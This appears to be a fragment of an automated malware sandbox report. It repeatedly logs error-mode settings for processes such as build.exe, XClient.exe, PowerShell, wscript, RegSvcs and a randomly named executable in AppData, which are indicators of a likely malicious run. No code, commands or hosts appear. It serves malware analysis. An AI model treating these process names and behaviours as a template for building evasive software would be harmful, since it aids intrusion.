Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
